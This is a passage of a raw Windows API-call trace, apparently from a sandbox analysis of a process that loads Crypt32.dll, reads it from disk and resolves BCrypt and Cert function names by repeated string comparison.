0 [0107.122] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunction") returned 1 [0107.122] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0107.122] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0107.122] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContext") returned 1 [0107.122] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContextFunction") returned 1 [0107.122] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateContext") returned 1 [0107.122] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateHash") returned 1 [0107.122] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateMultiHash") returned 1 [0107.123] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDecrypt") returned 1 [0107.123] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeleteContext") returned 1 [0107.123] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeriveKey") returned 0 [0107.123] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunction") returned 1 [0107.123] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunctionProvider") returned 1 [0107.123] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0107.123] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContext") returned 1 [0107.123] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContextFunction") returned 1 [0107.123] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateContext") returned 1 [0107.123] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateHash") returned 1 [0107.123] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateMultiHash") returned 1 [0107.123] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDecrypt") returned 1 [0107.123] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeleteContext") returned 1 [0107.123] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKey") returned 1 [0107.123] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKeyCapi") returned 0 [0107.123] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunction") returned 1 [0107.123] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunctionProvider") returned 1 [0107.123] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0107.123] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContext") returned 1 [0107.123] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContextFunction") returned 1 [0107.123] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateContext") returned 1 [0107.123] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateHash") returned 1 [0107.123] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateMultiHash") returned 1 [0107.123] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDecrypt") returned 1 [0107.123] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeleteContext") returned 1 [0107.123] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKey") returned 1 [0107.123] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyCapi") returned 1 [0107.123] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyPBKDF2") returned 0 [0107.124] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunction") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContext") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContextFunction") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateContext") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateHash") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateMultiHash") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDecrypt") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeleteContext") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKey") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDestroyHash") returned 0 [0107.124] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunction") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContext") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContextFunction") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateContext") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateHash") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateMultiHash") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDecrypt") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeleteContext") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKey") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyHash") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyKey") returned 0 [0107.124] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunction") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunctionProvider") returned 1 [0107.124] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContext") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContextFunction") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateContext") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateHash") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateMultiHash") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDecrypt") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeleteContext") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKey") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyCapi") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyHash") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyKey") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroySecret") returned 0 [0107.125] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunction") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContext") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateContext") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateHash") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateMultiHash") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDecrypt") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeleteContext") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKey") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyHash") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyKey") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroySecret") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDuplicateHash") returned 0 [0107.125] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunction") returned 1 [0107.125] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0107.126] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0107.126] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContext") returned 1 [0107.126] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContextFunction") returned 1 [0107.126] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateContext") returned 1 [0107.126] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateHash") returned 1 [0107.126] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateMultiHash") returned 1 [0107.126] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDecrypt") returned 1 [0107.126] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeleteContext") returned 1 [0107.126] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKey") returned 1 [0107.126] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0107.126] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0107.126] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyHash") returned 1 [0107.126] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyKey") returned 1 [0107.126] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroySecret") returned 1 [0107.126] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateHash") returned 1 [0107.126] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateKey") returned 0 [0107.126] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunction") returned 1 [0107.126] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0107.126] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0107.126] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContext") returned 1 [0107.126] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0107.126] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateContext") returned 1 [0107.126] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateHash") returned 1 [0107.126] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateMultiHash") returned 1 [0107.126] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDecrypt") returned 1 [0107.126] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeleteContext") returned 1 [0107.126] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKey") returned 1 [0107.126] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyCapi") returned 1 [0107.126] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0107.126] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyHash") returned 1 [0107.126] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyKey") returned 1 [0107.126] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroySecret") returned 1 [0107.127] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateHash") returned 1 [0107.127] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateKey") returned 1 [0107.127] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptEncrypt") returned 0 [0107.127] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunction") returned 1 [0107.127] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunctionProvider") returned 1 [0107.127] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0107.127] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContext") returned 1 [0107.127] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContextFunction") returned 1 [0107.127] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateContext") returned 1 [0107.127] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateHash") returned 1 [0107.127] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateMultiHash") returned 1 [0107.127] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDecrypt") returned 1 [0107.127] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeleteContext") returned 1 [0107.127] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKey") returned 1 [0107.127] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyCapi") returned 1 [0107.127] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0107.127] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyHash") returned 1 [0107.127] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyKey") returned 1 [0107.127] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroySecret") returned 1 [0107.127] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateHash") returned 1 [0107.127] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateKey") returned 1 [0107.127] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEncrypt") returned 1 [0107.127] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEnumAlgorithms") returned 0 [0107.127] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunction") returned 1 [0107.127] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunctionProvider") returned 1 [0107.127] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0107.127] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContext") returned 1 [0107.127] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContextFunction") returned 1 [0107.127] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateContext") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateHash") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateMultiHash") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDecrypt") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeleteContext") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKey") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyCapi") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyHash") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyKey") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroySecret") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateHash") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateKey") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEncrypt") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumAlgorithms") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumContextFunctionProviders") returned 0 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunction") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunctionProvider") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContext") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContextFunction") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateContext") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateHash") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateMultiHash") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDecrypt") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeleteContext") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKey") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyCapi") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0107.128] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyHash") returned 1 [0107.129] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyKey") returned 1 [0107.129] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroySecret") returned 1 [0107.129] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateHash") returned 1 [0107.129] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateKey") returned 1 [0107.129] GetProcessHeap () returned 0x430000 [0107.129] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d52010 | out: hHeap=0x430000) returned 1 [0107.129] GetProcessHeap () returned 0x430000 [0107.129] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x449300 [0107.130] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffc5c190000 [0107.136] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0107.137] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0107.137] GetModuleFileNameA (in: hModule=0x7ffc5c190000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0107.137] CreateFileA (lpFileName="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0107.137] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0107.137] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0107.137] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1847520) returned 1 [0107.137] GetProcessHeap () returned 0x430000 [0107.137] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1c30e0) returned 0x411a040 [0107.424] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0107.424] ReadFile (in: hFile=0x160, lpBuffer=0x411a040, nNumberOfBytesToRead=0x1c30e0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x411a040*, lpNumberOfBytesRead=0x14f5a4*=0x1c30e0, lpOverlapped=0x0) returned 1 [0107.446] CloseHandle (hObject=0x160) returned 1 [0107.447] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertAddCRLContextToStore") returned 0 [0107.447] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0107.447] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 0 [0107.447] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLContextToStore") returned 1 [0107.447] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0107.447] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCTLContextToStore") returned 0 [0107.447] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0107.447] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0107.447] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLContextToStore") returned 1 [0107.447] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLLinkToStore") returned 0 [0107.447] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLContextToStore") returned -1 [0107.447] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0107.447] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLContextToStore") returned -1 [0107.447] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0107.447] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCertificateContextToStore") returned 0 [0107.447] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLContextToStore") returned -1 [0107.447] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0107.447] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLContextToStore") returned -1 [0107.447] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0107.447] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0107.447] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateLinkToStore") returned 0 [0107.447] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0107.447] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0107.447] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0107.448] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0107.448] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0107.448] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0107.448] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddEncodedCRLToStore") returned 0 [0107.448] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0107.448] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0107.448] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0107.448] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0107.448] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0107.448] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0107.448] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0107.448] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCTLToStore") returned 0 [0107.449] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLContextToStore") returned 1 [0107.449] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0107.449] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLContextToStore") returned 1 [0107.449] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0107.449] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0107.449] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0107.449] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCRLToStore") returned -1 [0107.449] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCTLToStore") returned -1 [0107.449] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCertificateToStore") returned 0 [0107.449] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLContextToStore") returned 1 [0107.449] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLLinkToStore") returned 1 [0107.449] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLContextToStore") returned 1 [0107.449] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLLinkToStore") returned 1 [0107.449] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateContextToStore") returned 1 [0107.449] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateLinkToStore") returned 1 [0107.449] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCRLToStore") returned -1 [0107.449] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCTLToStore") returned -1 [0107.449] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToStore") returned 1 [0107.449] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 0 [0107.449] lstrcmpA 